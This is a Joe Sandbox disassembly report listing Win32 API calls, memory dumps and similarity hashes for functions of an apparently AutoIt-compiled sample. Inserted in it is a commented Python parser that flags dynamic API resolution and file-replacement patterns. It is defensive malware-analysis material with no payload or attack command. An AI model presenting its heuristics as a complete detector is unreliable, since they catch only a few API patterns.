                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ItemMenu$Info_wcslen$Default
                                      • String ID: 0
                                      • API String ID: 1227352736-4108050209
                                      • Opcode ID: 7dec7cb8286912c8797803026a66599bb31aabbf9cc70edc07de6d21f872f6cd
                                      • Instruction ID: 2b500c26fa6c46075b3b10a7efbd717e22b170c23f94ff9043d2e51ea270d9a1
                                      • Opcode Fuzzy Hash: 7dec7cb8286912c8797803026a66599bb31aabbf9cc70edc07de6d21f872f6cd
                                      • Instruction Fuzzy Hash: A651BE71A183809BD714AF2ECC85B6B7BE4FF9B314F040A2DF995D21A1DB60D8068B52
                                      APIs
                                      • ShellExecuteExW.SHELL32(0000003C), ref: 0090AEA3
                                        • Part of subcall function 00887620: _wcslen.LIBCMT ref: 00887625
                                      • GetProcessId.KERNEL32(00000000), ref: 0090AF38
                                      • CloseHandle.KERNEL32(00000000), ref: 0090AF67
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CloseExecuteHandleProcessShell_wcslen
                                      • String ID: <$@
                                      • API String ID: 146682121-1426351568
                                      • Opcode ID: a6e638e1583955fb6f63b64764cd0ad0a05500c62279ae265e2b4afb279e4ea3
                                      • Instruction ID: 0b28187f59c2ad4b40feeb439870b3e52cf74244ef37e018f447fc039c8b9fce
                                      • Opcode Fuzzy Hash: a6e638e1583955fb6f63b64764cd0ad0a05500c62279ae265e2b4afb279e4ea3
                                      • Instruction Fuzzy Hash: 29716C71A00615DFCB14EF58C484A9EBBF4FF08314F148499E856AB7A2CB74ED45CBA2
                                      APIs
                                      • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 008E7206
                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 008E723C
                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 008E724D
                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 008E72CF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                      • String ID: DllGetClassObject
                                      • API String ID: 753597075-1075368562
                                      • Opcode ID: d774b500792d86591a09261700bb32266f86ecdd9122eca17353e0fef455a707
                                      • Instruction ID: 9046a5ac70f75e809ee431b6649f75a0f6903df14bf59b71dc03e4a4ddfe5f5d
                                      • Opcode Fuzzy Hash: d774b500792d86591a09261700bb32266f86ecdd9122eca17353e0fef455a707
                                      • Instruction Fuzzy Hash: D84181B1604245EFDB15CF55C884A9A7BB9FF46314F1480A9BE0ADF20AD7B1DD44CBA0
                                      APIs
                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00912F8D
                                      • LoadLibraryW.KERNEL32(?), ref: 00912F94
                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00912FA9
                                      • DestroyWindow.USER32(?), ref: 00912FB1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessageSend$DestroyLibraryLoadWindow
                                      • String ID: SysAnimate32
                                      • API String ID: 3529120543-1011021900
                                      • Opcode ID: 90efe359bf401b919a290a3d3f79ca9b8ed4ead5d8ca14518154a4c405dcde27
                                      • Instruction ID: f673deab115d1b530e0165cf11000a2ea264f59c84a9b8521d29d3f3d5982bfd
                                      • Opcode Fuzzy Hash: 90efe359bf401b919a290a3d3f79ca9b8ed4ead5d8ca14518154a4c405dcde27
                                      • Instruction Fuzzy Hash: 9821AC71304209ABEB116FA4DC84FFB77BDEB59364F104618FA60D22A0D771DCA2A760
                                      APIs
                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,008A4D1E,008B28E9,?,008A4CBE,008B28E9,009488B8,0000000C,008A4E15,008B28E9,00000002), ref: 008A4D8D
                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 008A4DA0
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,008A4D1E,008B28E9,?,008A4CBE,008B28E9,009488B8,0000000C,008A4E15,008B28E9,00000002,00000000), ref: 008A4DC3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: 4c35dd101238ba5324cd7ed5a0d88409c3abf6e211cb0064fd8b7e6277539da4
                                      • Instruction ID: 67f54e99e3183c624d8b34fdb0fce4feafb5b33cd8d01d8461ff99d9b3da0fa4
                                      • Opcode Fuzzy Hash: 4c35dd101238ba5324cd7ed5a0d88409c3abf6e211cb0064fd8b7e6277539da4
                                      • Instruction Fuzzy Hash: E7F0AF74A94218BBEB109F94DC49BEDBBB8EF85751F0040A4F905E2660CB709940EA90
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00884EDD,?,00951418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00884E9C
                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00884EAE
                                      • FreeLibrary.KERNEL32(00000000,?,?,00884EDD,?,00951418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00884EC0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Library$AddressFreeLoadProc
                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                      • API String ID: 145871493-3689287502
                                      • Opcode ID: 2b00d753eb2eeea5f33f3b9971554962bc645640f85ca36ad24b6f724ec8c24f
                                      • Instruction ID: c3e4581e1ff17ee4c98fa0c32201f9cc99ed69e8004a56943b5ed2cbc70d358f
                                      • Opcode Fuzzy Hash: 2b00d753eb2eeea5f33f3b9971554962bc645640f85ca36ad24b6f724ec8c24f
                                      • Instruction Fuzzy Hash: 29E08C76BAA623AB93222B25AC18AAB6658FFC1B72B054115FC04E2200DB60CD01D2A0
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,008C3CDE,?,00951418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00884E62
                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00884E74
                                      • FreeLibrary.KERNEL32(00000000,?,?,008C3CDE,?,00951418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00884E87
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Library$AddressFreeLoadProc
                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                      • API String ID: 145871493-1355242751
                                      • Opcode ID: 399e58cb0f18ba77265622733d773200383ac2615eef1977439cdb376e1fc474
                                      • Instruction ID: c8922bf6e51064f6bc0c6dde0f824cda70919d78cf2076d08943fefd26c71d26
                                      • Opcode Fuzzy Hash: 399e58cb0f18ba77265622733d773200383ac2615eef1977439cdb376e1fc474
                                      • Instruction Fuzzy Hash: E0D0C2327DA6226746322B246C08DCB2A18FF81B253458110B804E2110CF20CD01D2D0
                                      APIs
                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008F2C05
                                      • DeleteFileW.KERNEL32(?), ref: 008F2C87
                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 008F2C9D
                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008F2CAE
                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008F2CC0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: File$Delete$Copy
                                      • String ID:
                                      • API String ID: 3226157194-0
                                      • Opcode ID: 79c59fb5c4e4fa50c5578a3112074133c67ef71fbd90d7dabfcbc8552a11822d
                                      • Instruction ID: 73a1b0f7daa3d859930960c3b6a8a3bfadd319eb9133963d8ad6b18fdf1b7177
                                      • Opcode Fuzzy Hash: 79c59fb5c4e4fa50c5578a3112074133c67ef71fbd90d7dabfcbc8552a11822d
                                      • Instruction Fuzzy Hash: 13B12F71D0011DABDF15EBA8CC85EEEBB7DFF49354F1040A6F609E6151EA309A448F62
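Each record above lists, for one recovered function, its direct Win32 calls with arguments and call-site address, the memory dump the code was lifted from, and Joe Sandbox's similarity identifiers. The following is an added example, not Joe Sandbox code or any tool the report uses: a small Python parser for this record layout that also flags two API patterns worth surfacing in triage, dynamic import resolution via LoadLibrary/GetModuleHandle plus GetProcAddress (here resolving the Wow64 file-system-redirection functions, which the call-site context with its AUTOIT marker string ties to the AutoIt runtime rather than to the payload), and a DeleteFile/CopyFile replacement sequence. The SAMPLE text is a constructed excerpt in the report's layout (records condensed, entries mixed across records), and the flag names and heuristics are this example's own.

```python
"""Parse Joe Sandbox per-function records (APIs / Memory Dump Source / Similarity
blocks) into Python objects and flag API-usage patterns. Added example, not Joe Sandbox code."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed excerpt in the report's layout (records condensed, entries mixed; not a verbatim copy).
SAMPLE = """\
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,00884EDD,?,00951418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00884E9C
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00884EAE
• FreeLibrary.KERNEL32(00000000,?,?,00884EDD,?,00951418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00884EC0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
• Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32.dll
• API String ID: 145871493-3689287502
• Instruction Fuzzy Hash: 29E08C76BAA623AB93222B25AC18AAB6658FFC1B72B054115FC04E2200DB60CD01D2A0
APIs
  • Part of subcall function 008EE199: GetFileAttributesW.KERNEL32(?,008ECF95), ref: 008EE19A
• DeleteFileW.KERNEL32(?), ref: 008F2C87
• CopyFileW.KERNEL32(?,?,00000000), ref: 008F2C9D
• _wcslen.LIBCMT ref: 008EE5EB
Memory Dump Source
• Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
Similarity
• API ID: File$Delete$Copy
• String ID:
• API String ID: 3226157194-0
"""

# "Name.MODULE(arg,arg,...), ref: ADDR" or "Name.MODULE ref: ADDR" (no argument list)
API_RE = re.compile(r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
SUBCALL_RE = re.compile(r"Part of subcall function (?P<fn>[0-9A-Fa-f]+):\s*(?P<rest>.*)")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    subcall_of: Optional[str] = None  # set for "Part of subcall function X" entries


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    source_file: str = ""
    similarity: dict = field(default_factory=dict)


def parse_records(text):
    """Split the report text into one FunctionRecord per 'APIs' header."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":  # every record opens with its APIs header
                rec = FunctionRecord()
                records.append(rec)
            section = line
            continue
        if rec is None or not line.startswith("•"):
            continue
        body = line.lstrip("•").strip()
        if section == "APIs":
            sub = SUBCALL_RE.match(body)
            if sub:
                body = sub.group("rest")
            m = API_RE.match(body)
            if m:
                args = [a for a in (m.group("args") or "").split(",") if a]
                rec.apis.append(ApiCall(m.group("name"), m.group("module"), args,
                                        m.group("ref").upper(), sub.group("fn") if sub else None))
        elif section == "Memory Dump Source" and body.startswith("Source File:"):
            rec.source_file = body.split(":", 1)[1].split(",", 1)[0].strip()
        elif section == "Similarity":
            key, _, value = body.partition(":")
            rec.similarity[key.strip()] = value.strip()
    return records


LOADERS = {"LoadLibraryA", "LoadLibraryW", "GetModuleHandleA", "GetModuleHandleW", "GetModuleHandleExW"}


def resolved_imports(rec):
    """Export names passed as the second argument of a direct GetProcAddress call."""
    return [a.args[1] for a in rec.apis
            if a.name == "GetProcAddress" and a.subcall_of is None and len(a.args) > 1 and a.args[1] != "?"]


def flag_record(rec):
    """Heuristic flags (this example's own names); subcall entries belong to the callee's record."""
    names = {a.name for a in rec.apis if a.subcall_of is None}
    flags = []
    if "GetProcAddress" in names and names & LOADERS:
        flags.append("dynamic-api-resolution")
        if any(n.startswith("Wow64") for n in resolved_imports(rec)):
            flags.append("wow64-fs-redirection")
    if "DeleteFileW" in names and names & {"CopyFileW", "MoveFileW"}:
        flags.append("file-replace")
    return flags


def summarize(text):
    """Map each record's Joe Sandbox 'API ID' to the flags raised for it."""
    return {r.similarity.get("API ID", "?"): flag_record(r) for r in parse_records(text)}


if __name__ == "__main__":
    for api_id, flags in summarize(SAMPLE).items():
        print(f"{api_id}: {', '.join(flags) or '-'}")
```

Direct calls and "Part of subcall function" entries are kept apart on purpose: the subcall lines repeat API usage that is already attributed to the callee's own record, so counting them here would double-count and blur which function actually performs the resolution. The "API ID" string Joe Sandbox derives from the call set is used as the record key because it is stable across re-analyses of the same function, unlike the call-site addresses.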
                                      APIs
                                      • __WSAFDIsSet.WS2_32(00000000,?), ref: 00901DC0
                                      • WSAGetLastError.WS2_32 ref: 00901DF2
                                      • htons.WS2_32(?), ref: 00901EDB
                                      • inet_ntoa.WS2_32(?), ref: 00901E8C
                                        • Part of subcall function 008E39E8: _strlen.LIBCMT ref: 008E39F2
                                        • Part of subcall function 00903224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,008FEC0C), ref: 00903240
                                      • _strlen.LIBCMT ref: 00901F35
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                      • String ID:
                                      • API String ID: 3203458085-0
                                      • Opcode ID: f7af78d0fe8e1bf00f528fc0ebd9adcf7bbe56b18867ed24569ec74f044816d8
                                      • Instruction ID: b8c90348f759f6d2e6cee8374e4ba00ea24a231901f46866f703e3bd75482bbf
                                      • Opcode Fuzzy Hash: f7af78d0fe8e1bf00f528fc0ebd9adcf7bbe56b18867ed24569ec74f044816d8
                                      • Instruction Fuzzy Hash: 5CB1B071204341AFD724EF28C885E2A7BA9FF85318F54894CF5569B2E2DB31ED41CB92
                                      APIs
                                      • GetCurrentProcessId.KERNEL32 ref: 0090A427
                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0090A435
                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0090A468
                                      • CloseHandle.KERNEL32(?), ref: 0090A63D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                      • String ID:
                                      • API String ID: 3488606520-0
                                      • Opcode ID: 7010d7cc4c9249fd37a4d87618ff6fcbcded71d3195c184c3af687065fe97f44
                                      • Instruction ID: 02cbe102863686fd486a20cdc8e650ab57499780be37faaa707428da84d77f5b
                                      • Opcode Fuzzy Hash: 7010d7cc4c9249fd37a4d87618ff6fcbcded71d3195c184c3af687065fe97f44
                                      • Instruction Fuzzy Hash: 39A12D716043019FE720EF28D886B2AB7E5BF84714F14885DF55ADB2D2DAB1EC418B92
                                      APIs
                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00923700), ref: 008BBB91
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0095121C,000000FF,00000000,0000003F,00000000,?,?), ref: 008BBC09
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00951270,000000FF,?,0000003F,00000000,?), ref: 008BBC36
                                      • _free.LIBCMT ref: 008BBB7F
                                        • Part of subcall function 008B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,008BD7D1,00000000,00000000,00000000,00000000,?,008BD7F8,00000000,00000007,00000000,?,008BDBF5,00000000), ref: 008B29DE
                                        • Part of subcall function 008B29C8: GetLastError.KERNEL32(00000000,?,008BD7D1,00000000,00000000,00000000,00000000,?,008BD7F8,00000000,00000007,00000000,?,008BDBF5,00000000,00000000), ref: 008B29F0
                                      • _free.LIBCMT ref: 008BBD4B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                      • String ID:
                                      • API String ID: 1286116820-0
                                      • Opcode ID: d9bb8367f56242c593550c0c2d99dcc3575e75d35afdbf39220f054e026a2ef1
                                      • Instruction ID: 2855b1db777479de6f3234ceb57f1b5f8153d76ea48bca3abeb5b70f77628104
                                      • Opcode Fuzzy Hash: d9bb8367f56242c593550c0c2d99dcc3575e75d35afdbf39220f054e026a2ef1
                                      • Instruction Fuzzy Hash: 4451C571904209AFCB14EF699C81AEEBBB8FF45360F10466AE464D7391EBB09E409B51
                                      APIs
                                        • Part of subcall function 008EDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008ECF22,?), ref: 008EDDFD
                                        • Part of subcall function 008EDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008ECF22,?), ref: 008EDE16
                                        • Part of subcall function 008EE199: GetFileAttributesW.KERNEL32(?,008ECF95), ref: 008EE19A
                                      • lstrcmpiW.KERNEL32(?,?), ref: 008EE473
                                      • MoveFileW.KERNEL32(?,?), ref: 008EE4AC
                                      • _wcslen.LIBCMT ref: 008EE5EB
                                      • _wcslen.LIBCMT ref: 008EE603
                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 008EE650
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                      • String ID:
                                      • API String ID: 3183298772-0
                                      • Opcode ID: f6903d5061d315f654839b38645268120887e1dea35eccb5f3d1559969c0a806
                                      • Instruction ID: d8ca24c22ef8667d0e205baa139412aeb5fb58040a41c071ff8401899896b320
                                      • Opcode Fuzzy Hash: f6903d5061d315f654839b38645268120887e1dea35eccb5f3d1559969c0a806
                                      • Instruction Fuzzy Hash: 115192B24087855BD724EB94C8819DB73ECFF86344F00492EF589D3191EE74A288875B
